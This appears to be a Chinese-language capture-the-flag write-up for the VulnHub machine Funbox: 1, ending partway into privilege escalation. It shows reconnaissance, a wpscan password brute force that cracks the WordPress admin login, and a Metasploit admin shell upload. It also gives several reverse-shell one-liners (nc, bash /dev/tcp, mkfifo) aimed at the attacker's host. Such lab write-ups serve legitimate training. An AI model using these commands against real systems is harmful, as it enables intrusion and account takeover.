Funbox
作者:jason_huawen
靶機資訊
名稱:Funbox: 1
地址:
https://www.vulnhub.com/entry/funbox-1,518/
識別目標主機IP地址
─(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:c7:64:09 1 60 PCS Systemtechnik GmbH
192.168.56.164 08:00:27:a7:af:87 1 60 PCS Systemtechnik GmbH
利用Kali Linux自帶的netdiscover工具識別目標主機的IP地址為192.168.56.164
NMAP掃描
──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.164 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-10 21:17 EST
Nmap scan report for bogon (192.168.56.164)
Host is up (0.00013s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry
|_/secret/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=1/10%Time=63BE1C3F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:A7:AF:87 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.83 seconds
NMAP掃描結果表明目標主機有4個開放埠:21(FTP)、22(SSH)、80(HTTP)、33060(Mysqlx?)
獲得Shell
21埠
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ ftp 192.168.56.164
Connected to 192.168.56.164.
220 ProFTPD Server (Debian) [::ffff:192.168.56.164]
Name (192.168.56.164:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
-
目標主機不允許匿名訪問;
-
FTP服務軟體維ProFTDd,但版本未知
80埠
Kali Linux上瀏覽器訪問80埠,回傳錯誤,發現指向了funbox.fritz.box,將其加入/etc/hosts檔案中:
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo vim /etc/hosts
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.164 funbox.fritz.box
重繪頁面,從回傳頁面得知為wordpress站點,
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ curl http://funbox.fritz.box/robots.txt
Disallow: /secret/
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ curl http://funbox.fritz.box/secret/
No secrets here. Try harder !
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ nikto -h http://192.168.56.164
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.164
+ Target Hostname: 192.168.56.164
+ Target Port: 80
+ Start Time: 2023-01-10 21:26:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://funbox.fritz.box/
+ Uncommon header 'link' found, with multiple values: (<http://funbox.fritz.box/index.php/wp-json/>; rel="https://api.w.org/",<http://funbox.fritz.box/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Multiple index files found: /index.php, /default.htm
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /secret/: This might be interesting...
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7916 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2023-01-10 21:27:20 (GMT-5) (69 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
nikto工具發現了wordpress管理后臺,再嘗試用wpscan工具之前,先掃描一下有無其他可利用的目錄或者檔案,
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/10 21:28:50 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.164/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.164/wp-includes/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.164/secret/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.164/wp-admin/]
/server-status (Status: 403) [Size: 279]
Progress: 220410 / 220561 (99.93%)
===============================================================
2023/01/10 21:29:32 Finished
===============================================================
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,js,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/10 21:29:43 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 61294]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.164/wp-content/]
/wp-login.php (Status: 200) [Size: 4502]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.164/wp-includes/]
/readme.html (Status: 200) [Size: 7278]
/robots.txt (Status: 200) [Size: 19]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.164/secret/]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.164/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/wp-signup.php (Status: 302) [Size: 0] [--> http://funbox.fritz.box/wp-login.php?action=register]
/server-status (Status: 403) [Size: 279]
Progress: 1322235 / 1323366 (99.91%)
===============================================================
2023/01/10 21:34:31 Finished
===============================================================
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ dirb http://192.168.56.164
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jan 10 21:34:37 2023
URL_BASE: http://192.168.56.164/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.164/ ----
+ http://192.168.56.164/index.php (CODE:200|SIZE:61294)
+ http://192.168.56.164/robots.txt (CODE:200|SIZE:19)
==> DIRECTORY: http://192.168.56.164/secret/
+ http://192.168.56.164/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.164/wp-admin/
==> DIRECTORY: http://192.168.56.164/wp-content/
==> DIRECTORY: http://192.168.56.164/wp-includes/
+ http://192.168.56.164/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.56.164/secret/ ----
+ http://192.168.56.164/secret/index.html (CODE:200|SIZE:30)
---- Entering directory: http://192.168.56.164/wp-admin/ ----
+ http://192.168.56.164/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-admin/css/
==> DIRECTORY: http://192.168.56.164/wp-admin/images/
==> DIRECTORY: http://192.168.56.164/wp-admin/includes/
+ http://192.168.56.164/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-admin/js/
==> DIRECTORY: http://192.168.56.164/wp-admin/maint/
==> DIRECTORY: http://192.168.56.164/wp-admin/network/
==> DIRECTORY: http://192.168.56.164/wp-admin/user/
---- Entering directory: http://192.168.56.164/wp-content/ ----
+ http://192.168.56.164/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-content/plugins/
==> DIRECTORY: http://192.168.56.164/wp-content/themes/
==> DIRECTORY: http://192.168.56.164/wp-content/upgrade/
==> DIRECTORY: http://192.168.56.164/wp-content/uploads/
---- Entering directory: http://192.168.56.164/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/network/ ----
+ http://192.168.56.164/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.164/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-admin/user/ ----
+ http://192.168.56.164/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.164/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/plugins/ ----
+ http://192.168.56.164/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/themes/ ----
+ http://192.168.56.164/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Jan 10 21:34:57 2023
DOWNLOADED: 36896 - FOUND: 14
gobuster或者dirb沒有掃描出更多有價值的目錄或者檔案,
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ wpscan --url http://funbox.fritz.box/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ?
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox.fritz.box/ [192.168.56.164]
[+] Started: Tue Jan 10 21:36:24 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://funbox.fritz.box/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox.fritz.box/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://funbox.fritz.box/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://funbox.fritz.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] joe
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jan 10 21:36:34 2023
[+] Requests Done: 57
[+] Cached Requests: 8
[+] Data Sent: 14.838 KB
[+] Data Received: 573.9 KB
[+] Memory used: 239.93 MB
[+] Elapsed time: 00:00:09
wpscan掃描出用戶:admin joe,接下來看是否可以破解admin的密碼?
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ wpscan --url http://funbox.fritz.box/ -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ?
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox.fritz.box/ [192.168.56.164]
[+] Started: Tue Jan 10 21:36:56 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://funbox.fritz.box/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox.fritz.box/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://funbox.fritz.box/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://funbox.fritz.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / iubire
Trying admin / iubire Time: 00:00:11 < > (665 / 14345057) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: iubire
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jan 10 21:37:24 2023
[+] Requests Done: 806
[+] Cached Requests: 38
[+] Data Sent: 265.434 KB
[+] Data Received: 3.374 MB
[+] Memory used: 287.012 MB
[+] Elapsed time: 00:00:27
用破解得到的用戶名和密碼登錄wordpress后臺,
當嘗試修改404模板時,update file,回傳錯誤:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
看來通過修改404模板的方式不可行,需要看一下其他方式,
msf6 > search wp_admin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.146
LHOST => 192.168.56.146
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.164
RHOSTS => 192.168.56.164
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD iubire
PASSWORD => iubire
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[-] Handler failed to bind to 192.168.56.146:5555:- -
[-] Handler failed to bind to 0.0.0.0:5555:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:5555).
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.56.146:5555
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) >
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS funbox.fritz.box
RHOSTS => funbox.fritz.box
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.56.146:5555
[*] Authenticating with WordPress using admin:iubire...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/RDbPTmaIBL/GUpqQZSzdR.php...
[*] Sending stage (39927 bytes) to 192.168.56.164
[+] Deleted GUpqQZSzdR.php
[+] Deleted RDbPTmaIBL.php
[+] Deleted ../RDbPTmaIBL
[*] Meterpreter session 1 opened (192.168.56.146:5555 -> 192.168.56.164:54050) at 2023-01-10 21:47:30 -0500
meterpreter > shell
Process 2443 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which nc
sh: 0: getcwd() failed: No such file or directory
/usr/bin/nc
nc -e /bin/bash 192.168.56.146 6666
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
/bin/sh: 6: Syntax error: Bad fd number
meterpreter > bash -c 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1'
[-] Unknown command: bash
meterpreter > shell
Process 2458 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.146 6666 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory
在meterpreter shell基礎上spawn一個新的shell
┌──(kali?kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.164] 56812
sh: 0: getcwd() failed: No such file or directory
/bin/sh: 0: can't access tty; job control turned off
$ which python
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
提權
ww-data@funbox:/home/funny$ cat .reminder.sh
cat .reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox
.reminder.sh提醒backup.sh為計劃任務,而該檔案任何人都有可寫權限
www-data@funbox:/home/funny$ cat .backup.sh
